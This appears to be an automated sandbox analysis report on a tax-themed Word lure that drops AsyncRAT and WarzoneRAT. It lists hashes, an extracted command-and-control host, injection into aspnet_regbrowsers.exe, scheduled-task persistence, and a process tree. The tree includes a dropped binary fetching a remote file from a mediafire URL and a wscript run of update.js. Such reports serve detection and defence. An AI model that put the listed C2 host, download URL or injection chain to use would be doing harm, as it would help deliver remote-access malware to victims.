asyncrat | 8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55

Analysis

max time kernel
119s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
06-04-2022 17:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tax_Documents.docx
Size

290KB
MD5

e7bc410788af86fe5e41695dd0ae308b
SHA1

8d9f55c90db961ea66993fd03e148b0dc9bcec5b
SHA256

8056c874a9bc6c2204ab4ea45a6f0ef4f2de0302e367695fdfd3599e4509df55
SHA512

2cd785643c49bd7ec7939e2684d9c4d12168d68df8ad554f2a6fcf9908cbd6fda8bc96d85c5828c8cd6085505a9b4348e031a74d30dc22ba9aee818b4e80d320

Score

10^/10

asyncrat warzonerat infostealer rat

Malware Config

Extracted

Family

warzonerat

mubbibun.duckdns.org:999

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exewscript.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	764	4228	wscript.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4924	4228	wscript.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
C:\ProgramData\hahahha.sdasd~txt	asyncrat
C:\ProgramData\hahahha.sdasd~txt	asyncrat
behavioral2/memory/556-204-0x0000000000C80000-0x0000000000CD4000-memory.dmp	asyncrat

Warzone RAT Payload 7 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1036-181-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/1036-182-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/3312-185-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/1036-187-0x0000000000400000-0x0000000000554000-memory.dmp	warzonerat
behavioral2/memory/4180-190-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/3500-194-0x0000000000405CE2-mapping.dmp	warzonerat
behavioral2/memory/1392-198-0x0000000000405CE2-mapping.dmp	warzonerat

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

ddond.comESETNONU.comhahahha.sdasd~txt

pid process

4596 ddond.com
4420 ESETNONU.com
556 hahahha.sdasd~txt
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

ddond.com

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation ddond.com

pid	process
4596	ddond.com
4420	ESETNONU.com
556	hahahha.sdasd~txt

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	ddond.com

Suspicious use of SetThreadContext 5 IoCs

Processes:

ESETNONU.com

description	pid	process	target process
PID 4420 set thread context of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 set thread context of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 set thread context of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 set thread context of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 set thread context of 1392	4420	ESETNONU.com	aspnet_regbrowsers.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4596	1392	WerFault.exe	aspnet_regbrowsers.exe
1480	3312	WerFault.exe	aspnet_regbrowsers.exe
3892	4180	WerFault.exe	aspnet_regbrowsers.exe
1700	1036	WerFault.exe	aspnet_regbrowsers.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

900 schtasks.exe

pid	process
900	schtasks.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4632 taskkill.exe
568 taskkill.exe
5008 taskkill.exe

pid	process
4632	taskkill.exe
568	taskkill.exe
5008	taskkill.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\DeviceId = "0018000832DC9F99"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\ApplicationFlags = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\IdentityCRL\Immersive\production\Property	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property\0018000832DC9F99 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79ef4adb8e2df4e96c16fb9ef12577e00000000020000000000106600000001000020000000935511eb83bdf8755862fb919c07fa40b0f71258874dd88017897b1f640eab0d000000000e8000000002000020000000cf3643ef1efbfd2f153e3202f39d4f0b59e0a4a5e8a6a2dd3d262eb5b07161a980000000bca43564b96c02e5b4b01a1f2190123f748bcfaec4f56faffdd777193e0e8ff682cae39c4f9becd54268f5bed21d70bd2a3acf8104e42bac6971b1babc97937effd1a7303f1dc6e9c0e314261365dc52a9edeba4f454860df080ba1998e6823e3dab13e76fe35e5c5483bd1799c85fa614efbc8684d9c0a9115230f5c980db7f400000006b4ef0570e1357f521f70824e71ef878e6ad8ff54903ec0405e244dc4083578293f6e16445db82bf8dcf9fc7f4ca0a27cb1dae4064aad5c3613c196babec661d	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{D6D5A677-0872-4AB0-9442-BB792FCE85C5}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79ef4adb8e2df4e96c16fb9ef12577e00000000020000000000106600000001000020000000e30f17dc8a3c5fc02bd0e12d6b5fafad0613a1748d531da0a25b46ed593d796a000000000e80000000020000200000002b1a43bdd6078d321fda048def5e956fa32556f099a3aef099f3e88ffb3ec9bb100d0000babe97ffc491f60a8a0c1b2fb24905019324f9c1de4d50a5dc08114ca839be12fe5dae7967d58772029f0558ba5df1affff581f25e57a85d8b3a92a408d073c2fd8b29b380d193a8c8287822b32e5d2f405312f67f3572ab19590cda9f3c6ce898c10152257319f6f29a50f2c6e8525ac470f4a9fbba5368e2f0cda5dfa804d6a3b591ee70dec10f07b07f47e3076a7398bda8cf12edc0b5e64e9ce1e02087bce9d0c2c7c78e7904148cc960bb513ce102fa476dfb93fc88dc583a63fbf0b35177bc2731262ebbda542c8e162cb3b24c2cc85296c6c77dc9d5dcfeba59180ccbadfa60f2f0fb8e06e77776282a9cb8096f1aa79364f04c62e06f99812d77e540e5973e32da0814a361ceecc32c0fb1afe349bd75500026554a4f2338082eacef349983e96da4d44faaec2870fe7b040d0153b16e439db301ff1242fff331b3f390d41911073aace492fe5b8acd2e4f65cba2d4182c6f74e9f1597cbeddc70903328a4b8c31e7cbb9affb40ca61a63e9c662fb28d18a3e94a2adb77d965bfa73c4e8a418ef186d3c31102028f1246ab76c4a800bf717b81ef515ebf79e7e2bed508b016ea0c389e4630157e86f31530fc3817643449cc910bdbf99f0af50af164a34c0a2829cc91e400bc8a69207acf8e7930a9b6ba9b2db211180221850610a4b06f7571c9fd15a2aa630b229b6cad711304ef4a8bfd0659a61a26cdf965cf6771f7290fc040f431ba4556232a04421abc2fb3240a60dc85216e6bc9befc4535537668e390d8c228edf92690aec04255394cd7813e8b75b0955efa8050a6733c5f55dc2165a3d600d5ddb42310021ef4df11277e4f1b81851825deb27d1ee62f0749116bc1d0a4f3437357e53a108f556b001103c6da7e39b2ca725cead380e6d232a2b0d2e050d274280cdb63a9da461bfb4a28914fe1af2b39a898eb1de0e02cbbc163ce50859fbcaeb16af450f1a093fc4b75466b72f44bb4b468a26f367dcf0e8841c4b06f2e3378ae556c2c251078f5717d6717ebcaf04cafd759c5a71c1e16e72c0b4b1b187dbd8f893ebee348e88cb41a7211ba55ce22d81fd1a4bcff72d08756d8ed2920f8ead705fa2a0971873bab933618cc63d4173b38b75ca3e22e5c9c92203dbbaf41c6e8b35696fa0af2d0a80b0f99f7be14004336636cf4e343097aab9ac7d5c9a6f025345507e777b6ba59a320828689047337f04c3830f676afba8504b57f7ff9d3dfe3e3229485a15f2b9570411b9a4f272d7232897bc71cca65eb2c1f469d04cf1d2c7721290510340a976a59eb70119d4885675e9d5626fadb35e499f4e8972ee3a00b45a35b577a56193a6e6d8bbe72ba3e065404f9e912dc190a3c9199f5feb78b2ebdb708d9aa41a2232bb8e2fc15ef41f874ef0e3adcfd8d34bdff65ee0afe1a40ba2d922f1a785b4ba363064dee7e42819942d319a3fda5fd5e7cc20d3fb33276bcc3edc7675c2a4072533638a91f8353716195295b7f5c56dee8502876dee495bca8f535f407886dce066a4658235fe839b17980927ffb12b3d0be13baa03ec2d75c23446c98605fecbb62604b6042f207ead469d749f5b0000c17ac3bde622580d96d017ce972a154ac3da02dbbcd87c5f6f9977c3f5721b0bbbf1d18356c3b3aaf6286d40d2511f579d54d190dfcf910bc2395fa98ee8daa512655cf93fcb7c7e39c53741392364191143602d937292ac06a5726087cf0e8b95a9d90b2c1ad1697d9908395c333510f9cd99019488104738eda319470a0d322b89acbad0ce7edd7863c8c98bbb75a8daf583aaace7d8e3155038aec32df2267409de31cbadfb864892806a25ef2dc7bf6814534ea57491bef97e439c705dba527faf6cfc5d66a1f9d1dc33606d9a7fd755dc29f5020347a0578267190a7991846194b4271ca09cdf11287c87bbdc7ca8b872d8e9dfa7a0a6714a9ac4c204caf94be89629228c9b5b70370957fb4166de33d771a6682f8270a1fe1e2def9efad5ac11ccbba1ac4f7ee57ac56e91814c42ae220ba63c93eb4cf6f76b5714df7803e8283fcf033afdfa490381791cb4c41bc2b58cbef2078033051d4f6f2b6ff22818e8ed8f6f20f53809a26852d77a4f87f15d77611cd3c022491c45e66f5c806bbf3fbb7e62a99c8f096887fee8e92d4e785d180c2dff2ea01686eb651e15ea428fdd84641e9afb9276b0dd899b48e83ff1064d8f759521ab93a095c2f786fc3fee01ad8f4530aa37232227ea31a70c4a41680a48e3697dee87fcd157bcf234e869a14384114b525259ed9b0de8d3a177459f5d7b9152cfeb42857b42f7ca02dfc7e2949af3ee9570588f30f62c75553210429e32c7d85c7f81ed26acfee6e7f53dd7e5ee25b686e76cb50776762f716c75651f41a39b3b9d30315d684e61ed91d698846671d5228fccb5acc340c149f30a4ac1068259734324f1c9b72df70f5bc46971b8177d9596ed9e867c21b72deb72815a7fd515ef97b04ed623cae923f61ced6555691fbce9ba0a30cd59d875fd00aed5b9289c08cf16ac814cbd91eea93307c0f916702b313c8d2c3ce0745ac0e97476547f267e54264701836bfc03197c3a8599c9f82ffd462020cc8fa98bd633725664c8ab8e5d5b1d045df9e7b6bea6c98568ac6efcf0114ae879f985877674c08a1858d4c207ff244991caa024205e337b3040ac092725cf6c85a85a000e033a8d36d67309f43e20d50059a0c5b24be6c9da7e6f38f06967a80171c9d7f47e729da2aa72b1d8554b6d24357e9b3f9f78ec695110481f78d2b4aa15251311da8ee3ce3660232de482e0cb407b79f084ad76ceb59c487c1c81eb396b7e22f4ed5260dfdca838bf9795b1a9618b8836df60943e11f502f08d2b146174b28ca001ce3e06f778a98dafcdbc11391e0a06930bea8286ebd38c8272d94754a51475306c42c0f14e5159af7ab407ee7e9d3c3c8d26b37eff7ffe0dfb2835c3f3104de8a1eae4fdd663132f5ec785ccf0750624132454a32e9d1efeee30e4abc55f2f649521c240fcd4fd07e49b3872f52e40df6accfd39c537dfc91c65564c617be60c3a3933f77d053981c2af4387fda7b8d41f3b00ceeee6d9a247d3afca136459c7ae968df3a0b2d47a338e3e0abc97046c05a07de145c5936289caaf7a6925676ee40d522d6ae0adf74ad48a153e9fcbb0f85a9be0dd5a43560ebaa962508e18e9e75c7c54c8a4d34d4292a2b9a2bb1af9a42955cdb6abdfe2f75079cf36f94bad8c12ff770fda33e27f4a7701b587e69a704a805bb0d4ce67b195033a0a00e20b0371b4dae2e5f9faeecf3a98d13f21394cd1fd8626bd8102611b8584e6e9d01955ff8b9c01bad1e47d68a79ff6331babf07c8698bf62ce00ba2395d73e3f3a7c86a7ec953c27ad779ae09e9e11a261b77c013438c5bd1c7874d289ad9cff495c82bc5067abd599bd14611c997a503215e6b95811b25ff3a1eb8d75715a13d917e40a7eb8afa3100911543da16b406ba634372ce7f6d696ed77e2019cc4badde1f1437c239d3a4d80bb73cf7f1bd6e24093583f1c617afb7c8e4df1df15d3320569ce18fd49e561869f7aa5ac131f49a5b0c6bc6b3f0c1682ac91ca7f629bfd6ff64d3d93af1b0790e140414873bb047b8c6e7bee3278d8ba6ba3397b60b88b35bcdd894ef049f00b110cf626fdcd21869c75529aa594e5954b97a53522995c0a059595d549430f18f6eb18ea590701e20d22402f2ccdff8c03b13091e943aa5be9dcd43c23407adffda56895465f30bd04c946e3fad80052994ce145332657d6a8da3b9478a8416f0c3212b4b94b0d623ab8dac3ec50609af233eab8b06866536a29c61dbf1a3ba7a79c59de55aaed3b3875cb589372050970301f2c4ef7b124e4eb9976eeedb127fd1d79db703d7df3a9a2714895ac643dda0545c9bcd5b7dcf77ef675ed945893536616a1ab5f1fca45a3d45fec1fbb0787bd852544f16a37b0fa214c275f9f67d887604e5e9084e40ea122d5b5b4768e2a6a63c4eacf9777233f6a34709a273621f8ee57ef570479ee7273380b1c0481665f76db0c6c804189283ee6bbc59c16da5df36ba4956eda522c3e8598780c745636c09365fd5bd7472e4b13251c17a6d6451caa565f97ca8170da8f80b879da30709e043e82d7ac2283a791fbd7189eb1d0b986a89d76608443f96ec5c053828220c8106109f3737ed57f2537763f0d3782c209de8436f8778a26b492b4e2fb0d72243ee178cc1b4ccf0561d0559ecaa0d65e82fe6bcec4e5644c2d909b766e96076e7dc400873372d1bcc698f58a75a031f7d9365b29709f60fcd8f105e9338ff03fc810bccd96248b2700f9666383f18dcf520d80ca4b7a82d1199a0603b6c99a90b287d95acf050b4ca52a5520fe19c4fcf879db4ddbab9949808c488d4368a6f55b6ec7315242c5e3fe8ef450ba52751334112165757c8287a618809850d3608c43bcf2f9431418cc8c244c58a516347f958474b4cb07355a7a2f440528915ce6cc4ffb0e9d4aa4091138f2b216df0b7a1ded51f2bc145f24ed8ecbbd3c497b8489620fc7afda63f6667c6586a64e3ec0d0003317cb66a004631def256cca5d6cf7e65ba2cb77e880c4868801a9113370f8bb9997ea5cfe01a4efdc19babe28b06759f5ce8581502c89bef6a30d22cbbfa5254bdd6ab1215e885fe53d01a4a26348ee138e238146dae528f256e12d745b7cec8c00bec186d8f42e32441400000004db788c9fa9b7b1601f2cff447c33b2ed20ea3715c4c363df2b60a4cd90159099dd4a962436bfdd802491cc6ff869dacd87080c3cee61bfa1d45aab58df26502	svchost.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

ddond.com

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	ddond.com
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	ddond.com

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3372 WINWORD.EXE
3372 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

ESETNONU.com

pid process

4420 ESETNONU.com
4420 ESETNONU.com
4420 ESETNONU.com
4420 ESETNONU.com
4420 ESETNONU.com
4420 ESETNONU.com
4420 ESETNONU.com

pid	process
4420	ESETNONU.com
4420	ESETNONU.com
4420	ESETNONU.com
4420	ESETNONU.com
4420	ESETNONU.com
4420	ESETNONU.com
4420	ESETNONU.com

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

ESETNONU.comtaskkill.exetaskkill.exetaskkill.exehahahha.sdasd~txt

description	pid	process
Token: SeDebugPrivilege	4420	ESETNONU.com
Token: SeDebugPrivilege	5008	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	568	taskkill.exe
Token: SeDebugPrivilege	556	hahahha.sdasd~txt

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXE

pid	process
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
3372	WINWORD.EXE
1440	EXCEL.EXE
1440	EXCEL.EXE
1440	EXCEL.EXE
1440	EXCEL.EXE
1440	EXCEL.EXE
1440	EXCEL.EXE
1512	EXCEL.EXE
1512	EXCEL.EXE
1512	EXCEL.EXE
1512	EXCEL.EXE
1512	EXCEL.EXE
1512	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEddond.comESETNONU.comcsc.exe

description	pid	process	target process
PID 3372 wrote to memory of 4216	3372	WINWORD.EXE	splwow64.exe
PID 3372 wrote to memory of 4216	3372	WINWORD.EXE	splwow64.exe
PID 4596 wrote to memory of 900	4596	ddond.com	schtasks.exe
PID 4596 wrote to memory of 900	4596	ddond.com	schtasks.exe
PID 4596 wrote to memory of 5008	4596	ddond.com	taskkill.exe
PID 4596 wrote to memory of 5008	4596	ddond.com	taskkill.exe
PID 4596 wrote to memory of 4632	4596	ddond.com	taskkill.exe
PID 4596 wrote to memory of 4632	4596	ddond.com	taskkill.exe
PID 4596 wrote to memory of 568	4596	ddond.com	taskkill.exe
PID 4596 wrote to memory of 568	4596	ddond.com	taskkill.exe
PID 4420 wrote to memory of 4596	4420	ESETNONU.com	csc.exe
PID 4420 wrote to memory of 4596	4420	ESETNONU.com	csc.exe
PID 4596 wrote to memory of 3496	4596	csc.exe	cvtres.exe
PID 4596 wrote to memory of 3496	4596	csc.exe	cvtres.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1036	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 448	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 448	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 448	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3312	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 4180	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 3500	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1392	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1392	4420	ESETNONU.com	aspnet_regbrowsers.exe
PID 4420 wrote to memory of 1392	4420	ESETNONU.com	aspnet_regbrowsers.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tax_Documents.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3372
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:4216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
- Modifies data under HKEY_USERS
PID:772

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1440

C:\Windows\system32\wscript.exe
wscript C:\Users\Public\update.js
1⤵
- Process spawned unexpected child process
PID:764

C:\ProgramData\ddond.com
C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/p3ay4it08j1s7hp/0main.htm/file
1⤵
